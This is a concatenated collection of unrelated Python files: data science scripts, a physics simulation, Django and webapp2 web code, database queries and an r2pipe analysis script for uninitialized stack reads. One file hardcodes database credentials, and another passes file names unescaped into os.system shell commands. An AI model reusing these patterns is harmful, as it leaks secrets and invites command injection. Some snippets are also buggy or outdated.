with pymongo.MongoClient() as conn:
db = conn.stu
myset = db.ccc
p = [
{'$group': {'_id': 'name', 'count': {'$sum': 1}}},
{'$match': {'count': {'$gt': 1}}}
]
cursor = myset.aggregate(p)
for item in cursor:
print(item)
|
999,453 | c79cdcfed6d862a5c6b9d74e38190fbfa0dd1369 | import matplotlib.pyplot as plt
import cv2
import numpy as np
import sys
import glob
import os
sys.path.append('/usr/local/lib/python2.7/dist-packages/')
def imageDistance(imgName1, imgName2, link=3):# returns distance between 2 images
img1 = cv2.imread(imgName1)
img2 = cv2.imread(imgName2)
if img1 is None or img2 is None:
print "Images not found", type(img1), imgName1, type(img2), imgName2
exit(0)
gray1= cv2.cvtColor(img1,cv2.COLOR_BGR2GRAY)
gray2= cv2.cvtColor(img2,cv2.COLOR_BGR2GRAY)
sift = cv2.xfeatures2d.SIFT_create()
kp1, des1 = sift.detectAndCompute(gray1,None)
kp2, des2 = sift.detectAndCompute(gray2,None)
bf = cv2.BFMatcher(cv2.NORM_L2, crossCheck=True)
matches = bf.match(des1,des2)
if link==1:
return min(matches, key=lambda x: x.distance).distance
elif link==2:
return max(matches, key=lambda x: x.distance).distance
else:#mean
distSum=0
for x in matches:
distSum+= x.distance
return distSum/len(matches)
def files(path):
points=[]
imList = glob.glob(path)
c1=imList[0]
for imName in imList:
point={}
point['name']=imName
point['c']= c1
points.append(point)
return points, c1
def Gonzalez(k, points, c1):
print "starting gonzy"
centers=set()
x = raw_input('Write center name or n if you want me to choose: ')
print x
if x!='n':
c1 = '../../dataSets/'+x
centers.add(c1)
print c1
for point in points:
point.update({'c':c1})
point.update({'distance':imageDistance(point['name'],c1)})
for i in range (1,k):
maxDist = -1
c=c1
for point in points:
distancePtC = imageDistance(point['name'],point['c'])
if distancePtC>maxDist:
maxDist = distancePtC
c=point['name']
centers.add(str(c))
for point in points:
distancePtOC = imageDistance(point['name'],point['c'])
distancePtNC = imageDistance(point['name'],c)
#print "distance to point ",point['c']," " , distancePtOC, "distance to point ",c ," ", distancePtNC
if distancePtOC>distancePtNC:
point['c']=c
point['distance']=distancePtNC
return list(centers)
def compare(c1,c2):
for c in c1:
if c not in c2:
return 1
for c in c2:
if c not in c1:
return 1
return 0
def lloyds(centers, points): # centers is a list of center image. points is a list of images
newCenters=list(centers)
cent=centers.pop(2) # to make them unequal the first time.
times = 3
while(times>0):
centers=list(newCenters)
print len(centers), "---95---"
clusters=[]
for i in range(len(centers)):
clusters.append([])
for p in points:
nearestD = 999999999
nearestC=-1
for c in range(len(centers)):
distance = imageDistance(centers[c], p['name'])
if distance<nearestD:
nearestD = distance
nearestC = c
p['c']=centers[nearestC]
clusters[nearestC].append(p)
for c in clusters:
print len(c)
times-=1
print times
continue
newCenters=[]
minDist=9999999999
center=''
distancesSaved={}
for c in clusters:
print len(clusters), len(c), " number of clusters, and number of points in each cluster"
count=0
for pt1 in c:
sumDist=0
for pt2 in c:
count+=1
print count," count"
if pt1['name']<pt2['name']:
x = (pt1['name'],pt2['name'])
else:
x = (pt2['name'],pt1['name'])
if x in distancesSaved:
val = distancesSaved[x]
else:
val = np.power(imageDistance(pt1['name'],pt2['name']),2)
distancesSaved[x]=val
sumDist+= val
if minDist>sumDist:
minDist=sumDist
center=pt1['name']
newCenters.append(center)
print len(centers),"---146---"
return centers, clusters
def clusterImages(centerToImageMap):
#print centerToImageMap
for center in centerToImageMap:
if not os.path.exists(str(center)):
os.makedirs(str(center))
for fileName in centerToImageMap[center]:
srcFile = fileName
dstFile = str(center) + '/'
print srcFile
os.system('cp \"'+ srcFile + '\" ' + dstFile)
def main():
points,c1=files("../../dataSets/*")
k=3
#centers= Gonzalez(k,points,c1)
centers = ['../../dataSets/Baseball_.jpg', '../../dataSets/chef-specialties-14200-professional-series-14-1-2-customizable-grill-mill-baseball-bat-pepper-mill.jpg', '../../dataSets/img-thing.jpg']
points = [{'distance': 261.2919604437692, 'c': '../../dataSets/Baseball_.jpg', 'name': '../../dataSets/baseball-large-1.jpg'}, {'distance': 271.36981928507487, 'c': '../../dataSets/img-thing.jpg', 'name': '../../dataSets/1150SFR-2.jpg'}, {'distance': 299.62686694231155, 'c': '../../dataSets/img-thing.jpg', 'name': '../../dataSets/1b404498-b7b8-44e8-85d3-23fff5e5395b.jpg'}, {'distance': 303.7726349623307, 'c': '../../dataSets/Baseball_.jpg', 'name': '../../dataSets/2013-02-25_00004.jpg'}, {'distance': 309.7969883282979, 'c': '../../dataSets/Baseball_.jpg', 'name': '../../dataSets/2013_Baseball_glove2012040424._V386376726_.jpg'}, {'distance': 298.0247405578043, 'c': '../../dataSets/Baseball_.jpg', 'name': '../../dataSets/310654M01 (1).jpg'}, {'distance': 292.06456663842295, 'c': '../../dataSets/img-thing.jpg', 'name': '../../dataSets/310654M01 (2).jpg'}, {'distance': 292.06456663842295, 'c': '../../dataSets/img-thing.jpg', 'name': '../../dataSets/310654M01.jpg'}, {'distance': 306.71920147831577, 'c': '../../dataSets/img-thing.jpg', 'name': '../../dataSets/51YER+oAbaL._SY300_.jpg'}, {'distance': 311.9697136714541, 'c': '../../dataSets/Baseball_.jpg', 'name': '../../dataSets/8069-1_display.jpg'}, {'distance': 268.09523203793697, 'c': '../../dataSets/Baseball_.jpg', 'name': '../../dataSets/9-inch-handmade-Baseball-Ball-for-children-s-training-baseball-softball-kids-baseball-balls-game-sport.jpg'}, {'distance': 310.24679005940754, 'c': '../../dataSets/Baseball_.jpg', 'name': '../../dataSets/ash_clear_baseball_bat1_3.jpg'}, {'distance': 305.149411452444, 'c': '../../dataSets/Baseball_.jpg', 'name': '../../dataSets/baseball-bat.jpg'}, {'distance': 275.1050336970839, 'c': '../../dataSets/Baseball_.jpg', 'name': '../../dataSets/baseball-icon.png'}, {'distance': 256.8518034976186, 'c': '../../dataSets/Baseball_.jpg', 'name': '../../dataSets/baseball.jpg'}, {'distance': 251.25533689815757, 'c': '../../dataSets/Baseball_.jpg', 'name': '../../dataSets/baseball1).jpg'}, {'distance': 0.0, 'c': '../../dataSets/Baseball_.jpg', 'name': '../../dataSets/Baseball_.jpg'}, {'distance': 262.6793841044108, 'c': '../../dataSets/Baseball_.jpg', 'name': '../../dataSets/baseball_1600_clr_11646.png'}, {'distance': 272.8768889328529, 'c': '../../dataSets/Baseball_.jpg', 'name': '../../dataSets/baseball_3.png'}, {'distance': 238.9001382191976, 'c': '../../dataSets/Baseball_.jpg', 'name': '../../dataSets/baseball_bat_cm-f.jpg'}, {'distance': 287.9864354469407, 'c': '../../dataSets/Baseball_.jpg', 'name': '../../dataSets/cddfa81560c7da378eca2b060eec3cb3.jpg'}, {'distance': 0.0, 'c': '../../dataSets/chef-specialties-14200-professional-series-14-1-2-customizable-grill-mill-baseball-bat-pepper-mill.jpg', 'name': '../../dataSets/chef-specialties-14200-professional-series-14-1-2-customizable-grill-mill-baseball-bat-pepper-mill.jpg'}, {'distance': 281.4659144083659, 'c': '../../dataSets/Baseball_.jpg', 'name': '../../dataSets/download (1).jpg'}, {'distance': 272.2540369807063, 'c': '../../dataSets/Baseball_.jpg', 'name': '../../dataSets/download.jpg'}, {'distance': 302.982531015174, 'c': '../../dataSets/Baseball_.jpg', 'name': '../../dataSets/il_570xN.335862384.jpg'}, {'distance': 0.0, 'c': '../../dataSets/img-thing.jpg', 'name': '../../dataSets/img-thing.jpg'}, {'distance': 292.39212783044127, 'c': '../../dataSets/img-thing.jpg', 'name': '../../dataSets/infield-baseball-glove-1.jpg'}, {'distance': 318.9177953880953, 'c': '../../dataSets/chef-specialties-14200-professional-series-14-1-2-customizable-grill-mill-baseball-bat-pepper-mill.jpg', 'name': '../../dataSets/louisville-slugger-bat.png'}, {'distance': 318.0376394567355, 'c': '../../dataSets/Baseball_.jpg', 'name': '../../dataSets/mizuno-mzm271-youth-little-league-maple-wood-baseball-bat-2.jpg'}, {'distance': 252.970651358793, 'c': '../../dataSets/Baseball_.jpg', 'name': '../../dataSets/MP910220738.jpg'}, {'distance': 270.0766422662709, 'c': '../../dataSets/Baseball_.jpg', 'name': '../../dataSets/rawlings-pro-preferred-pros1175cbr-11-75-baseball-glove-right-hand-throw-11.jpg'}, {'distance': 248.37743021870216, 'c': '../../dataSets/Baseball_.jpg', 'name': '../../dataSets/SportsAttack_leather_baseball_large.jpg'}, {'distance': 255.0884132385254, 'c': '../../dataSets/Baseball_.jpg', 'name': '../../dataSets/_32.jpg'}]
print "gonzy done, starting lloyd"
centers, clusters = lloyds(centers,points)
# for x in centers:
# print x
# for y in points:
# print y
# print centers
# print points
clusters={i:[] for i in range(k)}
fault=0
for point in points:
for i in range(k):
print point,len(centers)
if point['c']==centers[i]:
clusters[i].append(point['name'])
if point['c']!=centers[i]:
if point['distance']>imageDistance(point['name'],centers[i]):
fault+=1
print clusters
clusterImages(clusters)
print fault
main()
|
999,454 | 93b37c09cbc6a76fc6ed4722253c91fb3580aa09 | import numpy as np
import random
import time
L=24
theta=np.zeros((L,L))
phi=np.zeros((L,L))
s=np.zeros((L,L,3))
f=open('Heat2.csv','ab')
g=open('Heat1.csv','ab')
def chirality(theta,phi):
s=np.zeros((L,L,3))
s[:,:,0]=np.sin(theta)*np.cos(phi)
s[:,:,1]=np.sin(theta)*np.sin(phi)
s[:,:,2]=np.cos(theta)
t=np.zeros((L+2,L+2,3))
t[1:L+1,1:L+1,:]=s
chi=0
for i in range(L):
for j in range(L):
ti=t[i+1,j+1,:]
tx=t[i+2,j+1,:]
tx_=t[i,j+1,:]
ty=t[i+1,j+2,:]
ty_=t[i+1,j,:]
chi=chi+np.dot(ti,np.cross(tx,ty))+np.dot(ti,np.cross(tx_,ty))+np.dot(ti,np.cross(tx,ty_))+np.dot(ti,np.cross(tx_,ty_))
return chi
def magnet(theta):
z=np.zeros((L,L))
z=np.cos(theta)
return (np.sum(z)/(L*L))
def monte(s,theta,phi,T):
J=1
D=6**0.5
B=[0,0,2] #acting along z-axis
beta=1/T
e=0.2#1
update=0
step=0
theta2=(theta+e*(np.random.rand(L,L)-0.5))%(np.pi) #theta has to be in range (0,pi)
phi2=phi+e*(np.random.rand(L,L)-0.5)
s2=np.zeros((L,L,3))
s2[:,:,0]=np.sin(theta2)*np.cos(phi2)
s2[:,:,1]=np.sin(theta2)*np.sin(phi2)
s2[:,:,2]=np.cos(theta2)
y=np.array([0,1,0])
x=np.array([1,0,0])
for i in range(0,L):
for j in range(0,L):
if np.sin(theta2[i,j])<0.00001: continue #else there will be a problem in taking log of sin(theta2)
si=s[i,j,:]
if i+1==L: sx=s[0,j,:]
else: sx=s[i+1,j,:]
if i-1==-1: sx_=s[L-1,j,:]
else: sx_=s[i-1,j,:]
if j+1==L: sy=s[i,0,:]
else: sy=s[i,j+1,:]
if j-1==-1: sy_=s[i,L-1,:]
else: sy_=s[i,j-1,:]
del_E=-J*np.dot(s2[i,j,:]-si,sx+sx_+sy+sy_) - np.dot(B,s2[i,j,:]-si) + D*np.dot(y,np.cross(s2[i,j,:]-si,sx-sx_)) - D*np.dot(x,np.cross(s2[i,j,:]-si,sy-sy_)) - T*(np.log(np.sin(theta2[i,j]))-np.log(np.sin(theta[i,j])))
step+=1
if del_E<0 or np.exp(-beta*del_E)>random.random():
update+=1
theta[i,j]=theta2[i,j]
phi[i,j]=phi2[i,j]
s[i,j,:]=s2[i,j,:]
return [s,theta,phi,step,update]
for T in np.arange(0.1,5.1,0.2):
t = time.time()
theta=np.random.rand(L,L)
phi=np.random.rand(L,L)
chi=0 #Net Chirality
X=[]
mag=0 #Net Magnetisation
for m in range(50001):
[s,theta,phi,step,update]=monte(s,theta,phi,T)
if m%100==0 and m>25000:
a=np.reshape(theta,(1,L*L))
b=np.reshape(phi,(1,L*L))
c=np.append(a,b)
np.savetxt(f,c,delimiter=',')
X.append(chirality(theta,phi))
mag+=magnet(theta)
if m%1000==0: print(int(m/1000),end=' ')
print("\n\n\n")
print("Temperature : ",T)
print("Acceptance Ratio: ",update/step)
print("Chirality: ",sum(X)/250)
print("Magnetisation: ",mag/250)
np.savetxt(g,X,delimiter=',')
a=np.reshape(theta,(1,L*L))
b=np.reshape(phi,(1,L*L))
filename_a="theta"+str(T)+".txt"
filename_b="phi"+str(T)+".txt"
np.savetxt(filename_a,a)
np.savetxt(filename_b,b)
elapsed = time.time() - t
print("Time elapsed for T = :",T," : ",elapsed)
print("\n\n\n") |
999,455 | c0a1365596ef027e6c169b132e426da03d84ef56 | """
날짜 : 2021/05/20
이름 : 김철학
내용 : 파이썬 데이터베이스 SQL 실습하기
"""
import pymysql
# 데이터베이스 접속
conn = pymysql.connect(host='192.168.10.114',
user='chhak2021',
password='1234',
db='chhak2021',
charset='utf8')
# SQL 실행 객체 생성
cur = conn.cursor()
# SQL 실행
sql = "SELECT * FROM `USER1`;"
cur.execute(sql)
#conn.commit()
# 결과출력
for row in cur.fetchall():
print('----------------')
print('아이디 :', row[0])
print('이름 :', row[1])
print('휴대폰 :', row[2])
print('나이 :', row[3])
print('----------------')
# 데이터베이스 종료
conn.close()
print('Select 완료...')
|
999,456 | c9e53e2dfc659dd51e7f4cf4471a6b39c598ce6f | # -*- coding: utf-8 -*-
#by liangwenhao
# 第 0019 题: 将 第 0016 题中的 numbers.xls 文件中的内容写到 numbers.xml 文件中
def write_numbers_to_xml(list=None, to_path=None):
if list is None or to_path is None:
return None
root_node = etree.Element('root')
root_node.text = "\n\t"
number_node = etree.SubElement(root_node, 'numbers')
comment_node = etree.Comment("\n数字信息\n")
comment_node.tail = "\n\t"
number_node.append(comment_node)
number_node.text = "\n\t" + stringer.list_to_json(list, "\t") + u'\n'
number_node.tail = "\n"
number_tree = etree.ElementTree(root_node)
number_tree.write(to_path, pretty_print=True, xml_declaration=True, encoding='utf-8')
|
999,457 | df3d45bb0460b966197aa10e10fcd86a66f31f63 | from django.http import JsonResponse
from django.shortcuts import render
from .serializers import StudentSerializer
from .form import StudentForm
from .models import Student
from django.views import View
class CRUDOps(View):
# def getmodal(self): #never used - just for future reference
# data = Student.objects.all()
# modal = ""
# for entry in data:
# modal += " <tr><td>" + entry.eno + "</td><td>" + entry.name + "</td><td>" + entry.branch + "</td><td>"
# modal += "<button class='editStudent' id='eStudent" + str(entry.id) + "' type='button'>Update</button>"
# modal += "<button class='deleteStudent' id='dStudent" + str(entry.id) + "' type='button'>Delete</button>"
# modal += "</td></tr>"
# return modal
def get(self, request):
form = StudentForm(request.POST)
studentdata = Student.objects.all()
context = {'form': form, 'studentdata': studentdata}
return render(request, 'index.html', context)
# return JsonResponse(context)
def post(self, request, sid=None):
form = StudentForm(request.POST)
if sid is not None:
student = Student.objects.get(id=sid)
form = StudentForm(request.POST, instance=student)
if form.is_valid():
form.save()
studentdata = Student.objects.all()
context = {'form': form, 'studentdata': studentdata}
return render(request, 'index.html', context)
def put(self, request, sid):
if sid is not None:
studentdata = Student.objects.get(id=sid)
return JsonResponse(StudentSerializer(studentdata).data, safe=False)
def delete(self, request, sid):
form = StudentForm(request.POST)
student = Student.objects.get(id=sid)
student.delete()
studentdata = Student.objects.all()
context = {'form': form, 'studentdata': studentdata}
return render(request, 'index.html', context)
|
999,458 | 8a7ee4e3a972d13d2af989c80408a9049268c1cf | import setup_environment
import util.task
util.task.run()
|
999,459 | d4a640fc7676ec35b7ac408a1fbe0dd7385c54e0 | def sum_two_numbers(num1,num2):
sum=num1+num2
return sum
num1=input('enter first number')
num2=input('enter second number')
x=sum_two_numbers(num1,num2)
print("sum={0}".format(x))
|
999,460 | 983d9748416e318c99c2ca67c06053e87a4cadcd | def lengthOfLastWord(s):
if not s:
return 0
ss = s.split()
return len(ss[-1]) |
999,461 | faaf636c62eaec6d1c5e4700d75a70f3eabf7913 | #!/usr/bin/python
import r2pipe
from time import sleep
from colorama import Fore, Back
'''
import angr
import pydot
import io
r2 = r2pipe.open()
func_start = int( r2.cmd('?v $FB'), 16 )
func_end = int( r2.cmd('?v $FE'), 16 )
func_code = ''.join( map( lambda b: chr(b), r2.cmdj("pcj $FS") ) )
proj = angr.Project( io.BytesIO(func_code),
load_options={'auto_load_libs': False,
"main_opts": {
'backend': 'blob',
'custom_base_addr': func_start,
'custom_arch': 'x86'
}
}
)
state = proj.factory.entry_state(mode='symbolic', add_options={
#angr.options.CGC_ZERO_FILL_UNCONSTRAINED_MEMORY,
#angr.options.CONSTRAINT_TRACKING_IN_SOLVER,
#"SYMBOLIC_WRITE_ADDRESSES",
angr.options.SYMBOLIC_INITIAL_VALUES,
#angr.options.LAZY_SOLVES,
#angr.options.UNICORN,
#"BYPASS_UNSUPPORTED_SYSCALL",
"CALLLESS"
})
def on_exec(state):
print "[exec] 0x%x" % state.scratch.ins_addr
def on_memread(state):
eip = state.scratch.ins_addr
mem_read_addr = state.se.eval(state.inspect.mem_read_address)
mem_read_value = state.se.eval(state.inspect.mem_read_expr)
print "[read] 0x%x: *0x%x -> 0x%X" % ( eip, mem_read_addr, mem_read_value )
def on_memwrite(state):
eip = state.scratch.ins_addr
mem_write_addr = state.se.eval(state.inspect.mem_write_address)
mem_write_value = state.se.eval(state.inspect.mem_write_expr)
print "[write] 0x%x: *0x%x <- 0x%X" % ( eip, mem_write_addr, mem_write_value )
def on_regread(state):
reg = state.inspect.reg_read_expr
print "[read] %s" % reg
state.inspect.b('instruction', when=angr.BP_AFTER, action=on_exec)
#state.inspect.b('mem_read', when=angr.BP_AFTER, action=on_memread)
#state.inspect.b('mem_write', when=angr.BP_AFTER, action=on_memwrite)
#state.inspect.b('reg_read', when=angr.BP_AFTER, action=on_regread)
sym_data = state.solver.BVS('', 0x100)
state.memory.store(0x00178000, sym_data)
state.regs.esp = 0x00178000
state.regs.ebp = 0x00178000
state.regs.eip = func_start
sm = proj.factory.simgr(state, save_unconstrained=True) # SimulationManager
sm.use_technique(angr.exploration_techniques.DFS())
covered_basic_blocks = set()
def draw_cover(covered_basic_blocks):
graph = pydot.Dot(graph_type='graph')
for bb in r2.cmdj("afbj"):
fillcolor = ('green','black') if bb["addr"] in covered_basic_blocks else ('black','white')
graph.add_node( pydot.Node( hex( bb["addr"] ), style="filled", fillcolor=fillcolor[0], fontcolor=fillcolor[1] ) )
for bb in r2.cmdj("afbj"):
if bb.get("fail"):
graph.add_edge( pydot.Edge( hex( bb["addr"] ) , hex( bb["fail"] ) ) )
if bb.get("jump"):
graph.add_edge( pydot.Edge( hex( bb["addr"] ) , hex( bb["jump"] ) ) )
graph.write_png('bb.png')
def discover(sm):
alternative_paths = set()
while sm.active and not sm.unconstrained and not sm.active[0].addr in covered_basic_blocks:
try:
basic_block = sm.active[0].addr
#print "0x%x" % basic_block
proj.factory.block(basic_block).capstone.pp()
covered_basic_blocks.add(basic_block)
except:
pass
sm.step()
draw_cover(covered_basic_blocks)
alternative_paths.update( sm.stashes['deferred'] )
#print sm.stashes
for path in alternative_paths:
sm = proj.factory.simgr(path, save_unconstrained=True)
sm.use_technique(angr.exploration_techniques.DFS())
discover(sm)
discover(sm)
#import pdb; pdb.set_trace()
'''
def check_UMR_stack(r2):
for function in r2.cmdj("aflj"):
vars_r = { var[0]:var[1].split(',') if len(var)>1 else [] for var in map( lambda s:s.split(' '), map( lambda s:s.strip(), r2.cmd("afvR @ %s" % function['offset']).split('\n') ) ) }
vars_w = { var[0]:var[1].split(',') if len(var)>1 else [] for var in map( lambda s:s.split(' '), map( lambda s:s.strip(), r2.cmd("afvW @ %s" % function['offset']).split('\n') ) ) }
r2.cmd("s %s" % function['offset'])
for (var_r,reads) in vars_r.items():
if var_r.find('arg') != -1:
continue
if r2.cmd("afvd %s" % var_r).find('bp+') != -1:
continue
print "\n[*] %s %s" % ( function['name'], var_r ),
for read in reads:
print read,
try:
bb_writes = set( map(lambda a:r2.cmdj("abj 0x%x"%a)[0]['addr'], map(lambda x:int(x,16), vars_w[var_r])))
bb_read_path = set(r2.cmdj("abtj %s 1" % read)[0])
except:
print Fore.LIGHTBLACK_EX + "\n[!] %s error analyze %s in %s" % (function['name'], var_r, read) + Fore.RESET
continue
if not bb_writes & bb_read_path:
if r2.cmdj("aoj @ %s" % read)[0]['mnemonic'] != 'lea':
print "\n" + Back.RED + Fore.BLACK + "[+] %s: UMR in %s %s" % (read, function['name'], var_r) + Back.RESET + Fore.RESET
break
r2 = r2pipe.open()
check_UMR_stack(r2) |
999,462 | 583affd51c5a42ea84cc9d629f0f5239dea41fb0 | import numpy as np
import pandas as pd
import matplotlib as mlp
import matplotlib.pyplot as plt
# https://github.com/JerryKurata/MachineLearningWithPython/
diabetes_data = pd.read_csv(r'src/ML Algorithms/1.ml.pima-data.csv')
# ticket_data = pd.read_csv(r'D:\svnTicketDispatcher\Inex Ticket Dispatcher\data\Inex Remedy Ticket Dump - July to May19\working\1.Inex Ticket Data Merged - July18 to May19.csv')
diabetes_data.head()
print(diabetes_data.shape)
print(diabetes_data.isnull().values.any())
# checking correlation
def plot_corr(df, size = 11):
'''funciotn plot correlation betwen feature of dataframe'''
corr = df.corr()
fig, ax = plt.subplots(figsize=(size, size))
ax.matshow(corr) # color code based on the correlation
plt.xticks(range(len(corr.columns)), corr.columns)
plt.yticks(range(len(corr.columns)), corr.columns)
plt.show()
plot_corr(diabetes_data, len(diabetes_data.columns))
print(diabetes_data.corr())
# plot_corr(ticket_data, len(ticket_data.columns))
# diabetes_data.corr()
del diabetes_data['skin']
diabetes_map = {True:1, False:0}
diabetes_data['diabetes'] = diabetes_data['diabetes'].map(diabetes_map)
print(diabetes_data.head())
num_true = len(diabetes_data.loc[diabetes_data['diabetes'] == True])
num_false = len(diabetes_data.loc[diabetes_data['diabetes']== False])
print(num_true, num_false)
print((num_true / (num_true + num_false)) * 100)
print((num_false / (num_true + num_false)) * 100)
#splitting data
from sklearn.cross_validation import train_test_split
feature_col_names = ['num_preg','glucose_conc','diastolic_bp','thickness','insulin','bmi','diab_pred','age',]
predicted_class_names = ['diabetes']
X = diabetes_data[feature_col_names]
print(X, type(X))
#values converts the df object in array
X = diabetes_data[feature_col_names].values
X
y = diabetes_data[predicted_class_names].values
print(X, type(X))
print(y, type(y))
X_train, X_test, y_train, y_test = train_test_split(X, y ,test_size=0.30, random_state=42)
print("Total % of training set {}".format((len(X_train)/len(diabetes_data.index)) * 100))
print("Total % of testing set {}".format((len(X_test)/len(diabetes_data.index)) * 100))
## post-split data preparation
diabetes_data.head() # thickness is 0
print("row missing values {}".format((len(diabetes_data.loc[diabetes_data['glucose_conc'] == 0]))))
print("row missing values {}".format((len(diabetes_data.loc[diabetes_data['diastolic_bp'] == 0]))))
print("row missing values {}".format((len(diabetes_data.loc[diabetes_data['thickness'] == 0]))))
print("row missing values {}".format((len(diabetes_data.loc[diabetes_data['insulin'] == 0]))))
print("row missing values {}".format((len(diabetes_data.loc[diabetes_data['bmi'] == 0]))))
print("row missing values {}".format((len(diabetes_data.loc[diabetes_data['diab_pred'] == 0]))))
print("row missing values {}".format((len(diabetes_data.loc[diabetes_data['age'] == 0]))))
# only insulin can be zero rest is not good data where value are zero
#what to do with missing data
# 1. ignore
# 2. replace with another values mean, median sd impute,
# replace value from expert
# 3. Drop observation
# using mean imputing
from sklearn.preprocessing import Imputer
fill_0 = Imputer(missing_values=0, strategy='mean', axis=0)
X_train = fill_0.fit_transform(X_train)
X_test = fill_0.fit_transform(X_test)
# training initial NB algorithm
from sklearn.naive_bayes import GaussianNB
nb_model = GaussianNB()
len(X_train)
X_train.shape
len(y_train)
y_train.shape
yt = y_train.ravel()
yt.shape
nb_model.fit(X_train, y_train.ravel())
x = np.array([[1, 2, 3], [4, 5, 6]])
from pprint import pprint
pprint(x.shape)
pprint(x)
pprint(x.ravel())
pprint(x.ravel().shape)
pprint(x.ravel(order='F'))
pprint(x.ravel(order='K'))
pprint(x.ravel(order='A'))
a = np.arange(12).reshape(2,3,2)
a
a.shape
a_s = np.arange(12).reshape(2,3,2).swapaxes(1,2)
a_s
pprint(x.reshape(1, 2, 3))
new_a = x.reshape(1, 2, 3)
new_a_1 = new_a.reshape(-1)
new_a_1.reshape(-1)
pprint(x.ravel())
from sklearn.metrics import accuracy_score
predicted_train = nb_model.predict(X_train)
accuracy_score(y_train,predicted_train) *100
predicted = nb_model.predict(X_test)
predicted
from sklearn import metrics
accuracy_score(y_test,predicted) *100
print(accuracy_score(y_test,predicted) *100)
# lets do imputing
print("confusion matrix")
print(metrics.confusion_matrix(y_test,predicted))
print(metrics.classification_report(y_test, predicted))
# try random forest model to improve accuracy
from sklearn.ensemble import RandomForestClassifier
rf_model = RandomForestClassifier(random_state=42)
rf_model.fit(X_train,y_train)
rf_predicted_train = rf_model.predict(X_train)
print(metrics.accuracy_score(y_train, rf_predicted_train))
# 98% accuraccy it is overfitting and will not work well on real world data
rf_predict_test = rf_model.predict(X_test)
print(metrics.accuracy_score(y_test, rf_predict_test))
# 70% accuracy, due to overfitting it works poortly on real world data
print(metrics.confusion_matrix(y_test, rf_predict_test))
print(metrics.classification_report(y_test, rf_predict_test))
# recall and precision more poor
# lets try logistics regression
from sklearn .linear_model import LogisticRegression
lr_model = LogisticRegression(C=0.7, random_state=42)
lr_model.fit(X_train, y_train.ravel())
lr_predicted_test = lr_model.predict(X_test)
print(metrics.accuracy_score(y_test, lr_predicted_test))
print(metrics.classification_report(y_test, lr_predicted_test))
# find values of c for recall improvement
C_start = 0.1
C_end = 5
C_inc =0.1
C_values , recall_scores =[], []
C_val = C_start
best_recall_score = 0
while (C_val < C_end):
C_values.append(C_val)
lr_model_loop =LogisticRegression(C=C_val,random_state=42)
lr_model_loop.fit(X_train, y_train.ravel())
lr_predicted_loop_test = lr_model_loop.predict(X_test)
recall_score = metrics.recall_score(y_test,lr_predicted_loop_test)
recall_scores.append(recall_score)
if recall_score > best_recall_score:
best_recall_score = recall_score
best_lr_predict_test = lr_predicted_loop_test
print(C_val, best_recall_score)
C_val = C_val + C_inc
best_score_C_val = C_values[recall_scores.index(best_recall_score)]
print(best_recall_score, best_score_C_val)
import matplotlib.pyplot as plt
plt.plot(C_values,recall_scores)
plt.xlabel("C value")
plt.ylabel("recall score")
plt.show()
# still 61% may be due to imb alance in dataset
# 65% DIABETICS AND 35% non diabetic and is imbalance of classes
# enabeld wieght hyperparameter to handle unbalance
#balanced weight
# find values of c for recall improvement
# logistic regression with balanced weight to handle class unbalances
C_start = 0.1
C_end = 5
C_inc =0.1
C_values , recall_scores =[], []
C_val = C_start
best_recall_score = 0
while (C_val < C_end):
C_values.append(C_val)
lr_model_loop =LogisticRegression(class_weight ="balanced" ,C=C_val ,random_state=42)
lr_model_loop.fit(X_train, y_train.ravel())
lr_predicted_loop_test = lr_model_loop.predict(X_test)
recall_score = metrics.recall_score(y_test,lr_predicted_loop_test)
recall_scores.append(recall_score)
if recall_score > best_recall_score:
best_recall_score = recall_score
best_lr_predict_test = lr_predicted_loop_test
print(C_val, best_recall_score)
C_val = C_val + C_inc
best_score_C_val = C_values[recall_scores.index(best_recall_score)]
print(best_recall_score, best_score_C_val)
import matplotlib.pyplot as plt
plt.plot(C_values,recall_scores)
plt.xlabel("C value")
plt.ylabel("recall score")
plt.show()
# lets try logistics regression
from sklearn .linear_model import LogisticRegression
lr_model = LogisticRegression(class_weight="balanced", C=best_recall_score, random_state=42)
lr_model.fit(X_train, y_train.ravel())
lr_predicted_test = lr_model.predict(X_test)
print(metrics.accuracy_score(y_test, lr_predicted_test))
print(metrics.classification_report(y_test, lr_predicted_test))
# use Cross validation
from sklearn .linear_model import LogisticRegressionCV
lr_model_cv = LogisticRegressionCV(n_jobs=1 ,Cs=3, cv=10 , refit=False, class_weight="balanced", random_state=42)
lr_model_cv.fit(X_train, y_train.ravel())
lr_predicted_cv_test = lr_model_cv.predict(X_test)
print(metrics.accuracy_score(y_test, lr_predicted_cv_test))
print(metrics.classification_report(y_test, lr_predicted_cv_test))
# n_jobs =1 use all the cores in pc
# cs = integer value tries to find best regularizatoin parameter
# CV = 10
|
999,463 | 0c5bb43c2668f2351cb142ce139881b56eefaa18 | """
url mapping for user app a part of OpenAl8az project.
By : Mahmoud Elshobaky (mahmoud.elshobaky@gmail.com).
"""
# import app engine frameworks
import webapp2
from webapp2_extras import routes
# import app settings
from settings import *
#import project modules and request handlers
from request_handlers import *
#URL Mapping
# ex. [webapp2.Route(_u+'/signup', SignUp, 'user-signup'),]
_u = URLS_PREFIX + '/user' # you can add prefix for app ex. -u = URLS_PREFIX + '/user'
urls = [
webapp2.Route(_u+'/signup', SignUp, 'user-signup'),
webapp2.Route(_u+'/login', LogIn, 'user-login'),
webapp2.Route(_u+'/logout', LogOut, 'user-logout'),
webapp2.Route(_u+'/profile', MyProfile, 'my-profile'),
webapp2.Route(_u+'/profile/changeavatar', ChangeAvatar, 'change-avatar'),
webapp2.Route(_u+'/profile/changecontact', ChangeContact, 'change-contact'),
(_u+'/([0-9]+)', Profile),
]
# rendring urls
#app = webapp2.WSGIApplication(urls,
# config=INTERNATIONAL_CFG, debug=DEBUG)
|
999,464 | ec79794dfd314a8f450713e990570bfc619ffb04 | """Plugin based functionality."""
# =============================================================================
# >> IMPORTS
# =============================================================================
# Source.Python
from translations.strings import LangStrings
# Source.Python Admin
from .. import admin_core_logger
# =============================================================================
# >> ALL DECLARATION
# =============================================================================
__all__ = (
'admin_plugins_logger',
'plugin_strings',
)
# =============================================================================
# >> GLOBAL VARIABLES
# =============================================================================
admin_plugins_logger = admin_core_logger.plugins
plugin_strings = LangStrings('_core/plugin_strings')
|
999,465 | f2654d062c7b19416f31252901ac7985fd0ae009 | import compileall
compileall.compile_dir("/app/", force=True,legacy=True) |
999,466 | 3ee819ef2ab833bb75dcf9b6d4349d97bd910348 | def doblar(n):
return n*2
def doblarla(n): return n*2
dobla = lambda num: num*2
print(dobla(3))
impar = lambda num: num%2 != 0
print(impar(5))
